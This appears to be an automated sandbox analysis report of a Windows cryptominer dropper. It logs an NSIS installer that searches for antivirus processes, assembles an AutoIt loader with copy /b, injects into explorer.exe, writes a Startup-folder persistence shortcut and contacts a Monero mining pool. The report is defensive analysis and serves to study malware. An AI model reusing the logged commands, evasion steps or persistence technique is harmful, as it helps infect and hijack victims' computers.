Source: C:\Windows\explorer.exe TID: 6208 | Thread sleep count: 133 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA132DE0 FindFirstFileExW,17_2_00007FF7AA132DE0
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA16CE3C GetFileAttributesW,FindFirstFileW,FindClose,17_2_00007FF7AA16CE3C
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF752042DE0 FindFirstFileExW,20_2_00007FF752042DE0
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF75207CE3C GetFileAttributesW,FindFirstFileW,FindClose,20_2_00007FF75207CE3C
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA0F5C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,17_2_00007FF7AA0F5C44
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\29442
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\29442\
Source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPX2
Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA0F3B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00007FF7AA0F3B64
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA115A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,17_2_00007FF7AA115A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA1341A8 GetProcessHeap,17_2_00007FF7AA1341A8
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,17_2_000002453CA21160
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA12AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7AA12AD08
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA138E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF7AA138E74
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA115850 SetUnhandledExceptionFilter,17_2_00007FF7AA115850
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA11566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7AA11566C
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF752025850 SetUnhandledExceptionFilter,20_2_00007FF752025850
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF75202566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF75202566C
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF75203AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF75203AD08
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF752048E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00007FF752048E74
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 21_2_0000014D5CA91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,21_2_0000014D5CA91160

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 163.172.171.111 10343
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtProtectVirtualMemory: Direct from: 0x7FF7AA12B26C
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtClose: Direct from: 0x7FF7AA16C3CD
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQueryInformationToken: Direct from: 0x7FF752093508
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQueryAttributesFile: Direct from: 0x7FF7AA16D642
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtProtectVirtualMemory: Direct from: 0x7FF7AA16C119
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtReadFile: Direct from: 0x7FF7AA0F7D7F
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQuerySystemInformation: Direct from: 0x7FF7AA16C4AD
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtClose: Direct from: 0x7FF75207C5C7
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQueryAttributesFile: Direct from: 0x7FF7AA16CE4E
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtDelayExecution: Direct from: 0x7FF752011C92
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtOpenFile: Direct from: 0x7FF7AA16BF1E
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtDelayExecution: Direct from: 0x7FF7AA16DFD8
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtProtectVirtualMemory: Direct from: 0x7FF7AA118FF0
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtClose: Direct from: 0x7FF7AA16CE61
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtProtectVirtualMemory: Direct from: 0x7FF7520083B5
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQuerySystemInformation: Direct from: 0x7FF8C88A26A1
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtClose: Direct from: 0x7FF7AA0F8693
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQuerySystemInformation: Direct from: 0x7FF752024924
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQueryAttributesFile: Direct from: 0x7FF75207D642
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtProtectVirtualMemory: Direct from: 0x7FF75203B26C
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQueryAttributesFile: Direct from: 0x7FF75207CE4E
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtSetInformationFile: Direct from: 0x7FF7AA0F7A79
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtClose: Direct from: 0x7FF7AA16C5C7
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtQuerySystemInformation: Direct from: 0x7FF75207C4AD
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtCreateFile: Direct from: 0x7FF7AA0F787C
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtDelayExecution: Direct from: 0x7FF75207DFD8
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtDelayExecution: Direct from: 0x7FF7AA101C92
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtWriteFile: Direct from: 0x7FF7AA16B9D7
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtClose: Direct from: 0x7FF75207C37B
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQuerySystemInformation: Direct from: 0x7FF7AA114924
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtSetInformationFile: Direct from: 0x7FF7AA0F7A91
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtProtectVirtualMemory: Direct from: 0x7FF752028FF0
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtClose: Direct from: 0x7FF7AA16C200
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtClose: Direct from: 0x7FF75207FD06
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtUnmapViewOfSection: Direct from: 0x7FF7AA16C4BD
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQueryAttributesFile: Direct from: 0x7FF7AA16C1E1
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtMapViewOfSection: Direct from: 0x7FF7AA16C508
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtOpenFile: Direct from: 0x7FF7AA16C37B
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | NtMapViewOfSection: Direct from: 0x7FF75207C4BD
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtQueryInformationToken: Direct from: 0x7FF7AA183508
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | NtProtectVirtualMemory: Direct from: 0x7FF7AA0F83B5
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com base: 2453CA20000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr base: 14D5CA90000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: PID: 6504 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: PID: 6504 base: 140001000 value: NU
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: PID: 6504 base: 1406F5000 value: DF
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: PID: 6504 base: 1408F6000 value: 00
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Memory written: PID: 6504 base: 11E1010 value: 00
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: PID: 3524 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: PID: 3524 base: 140001000 value: NU
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: PID: 3524 base: 1406F5000 value: DF
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: PID: 3524 base: 1408F6000 value: 00
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Memory written: PID: 3524 base: C94010 value: 00
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Thread register set: target process: 3640
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Thread register set: target process: 4148
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Thread register set: target process: 6504
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Thread register set: target process: 3524
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA0F3B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00007FF7AA0F3B64
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA114364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00007FF7AA114364
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\wendy + ..\psychiatry + ..\rid + ..\games + ..\norway + ..\matching + ..\jungle + ..\elliott + ..\jpg + ..\americans + ..\exhibits + ..\peeing + ..\typical + ..\innocent + ..\seafood + ..\nervous + ..\households + ..\ai + ..\hotel + ..\holdem + ..\drums + ..\carlo + ..\tm + ..\landscape + ..\resolutions + ..\def + ..\lambda + ..\biodiversity + ..\odds + ..\smithsonian + ..\blvd + ..\actual + ..\guy + ..\expert + ..\delaware + ..\eagle + ..\eugene + ..\exempt + ..\same + ..\ebooks + ..\individuals + ..\sucking + ..\chan + ..\turns + ..\satin + ..\dealing + ..\result + ..\through + ..\realized l
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\System32\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & echo url="c:\users\user\appdata\local\cybersphere dynamics\zeuschat.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & exit
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA15DB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,17_2_00007FF7AA15DB9C
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69AFF5000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066014740.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205059109.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: Reynolds.com, conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmp, ZeusChat.scr | Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA12FBB0 cpuid 17_2_00007FF7AA12FBB0
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA2A660 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,17_2_000002453CA2A660
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA1324E0 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,17_2_00007FF7AA1324E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count shown in the original matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Scripting; 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 412 Process Injection; 2 Registry Run Keys / Startup Folder; RC Scripts; Startup Items
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 121 Masquerading; 1 Virtualization/Sandbox Evasion; 412 Process Injection
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 17 System Information Discovery; 31 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 11 Input Capture; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1561926, Sample: file.exe, Startdate: 24/11/2024, Architecture: WINDOWS, Score: 100. The graph image itself is not reproduced; the process tree, dropped files, network endpoints and signatures it carried are:

• Start node: file.exe (70 dropped files) and wscript.exe are started. Signatures at the start node: Malicious sample detected (through community Yara rule); Yara detected Xmrig cryptocurrency miner; Sigma detected: Search for Antivirus process; 4 other signatures.
• DNS/IP nodes: xmr-eu2.nanopool.org (DNS related to crypt mining pools); DqnJUgbSFuO.DqnJUgbSFuO.
• file.exe: dropped C:\Users\user\AppData\Local\Temp\Guy (DOS), C:\Users\user\AppData\Local\Temp\Wendy (data), C:\Users\user\AppData\Local\Temp\Typical (data) and 46 other files (45 malicious); Writes many files with high entropy; started cmd.exe.
  cmd.exe: dropped C:\Users\user\AppData\Local\...\Reynolds.com (PE32+); Drops PE files with a suspicious file extension; Writes many files with high entropy; started Reynolds.com, a second cmd.exe (which dropped C:\Users\user\AppData\Local\Temp\29442\l, data), conhost.exe and 6 other processes.
    Reynolds.com: dropped C:\Users\user\AppData\Local\...\ZeusChat.scr (PE32+), C:\Users\user\AppData\Local\...\ZeusChat.js (ASCII), C:\Users\user\AppData\Local\...\M (data); Drops PE files with a suspicious file extension; Modifies the context of a thread in another process (thread injection); Writes many files with high entropy; 2 other signatures; started Reynolds.com and cmd.exe.
      Reynolds.com: Injects code into the Windows Explorer (explorer.exe); Modifies the context of a thread in another process (thread injection); started explorer.exe.
        explorer.exe: connects to xmr-eu2.nanopool.org 163.172.171.111, port 10343 (local port 49735), OnlineSASFR, United Kingdom; System process connects to network (likely due to code injection or exploit); started conhost.exe.
      cmd.exe: dropped C:\Users\user\AppData\...\ZeusChat.url (MS); started conhost.exe.
• wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage); started ZeusChat.scr.
  ZeusChat.scr: Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes; Found direct / indirect Syscall (likely to bypass EDR); started two further ZeusChat.scr instances.
    ZeusChat.scr: Injects code into the Windows Explorer (explorer.exe); started explorer.exe.
      explorer.exe: Found strings related to Crypto-Mining; started conhost.exe.

              No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Tech | 0% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-eu2.nanopool.org | 163.172.171.111 | true | false | | high
DqnJUgbSFuO.DqnJUgbSFuO | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.virustotal.com/en/search/?query= | explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | file.exe | false | | high
http://ocsp.entrust.net02 | file.exe | false | | high
http://ocsp.cloudflare.com/origin_ca0 | explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.entrust.net/rpa03 | file.exe | false | | high
http://crl.cloudflare.com/origin_ca.crl | explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://aia.entrust.net/ts1-chain256.cer01 | file.exe | false | | high
http://crl.cloudflare.com/origin_ca.crl0 | explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.cloudflare.com/origin_ca | explorer.exe, 00000012.00000003.2642127911.0000000001335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264409592.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/X | Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066097134.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205239967.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, Reynolds.com, 00000011.00000000.2255000492.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2411864117.0000000015614000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr, 00000014.00000000.2409093623.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr, 00000015.00000000.2415165241.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | file.exe | false | | high
http://www.autoitscript.com/autoit3/ | Reynolds.com, ZeusChat.scr | false | | high
https://github.com/horsicq/DIE-engine | explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/ts1ca.crl0 | file.exe | false | | high
https://www.autoitscript.com/autoit3/ | Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr | false | | high
http://crl.entrust.net/2048ca.crl0 | file.exe | false | | high
https://www.entrust.net/rpa0 | file.exe | false | | high
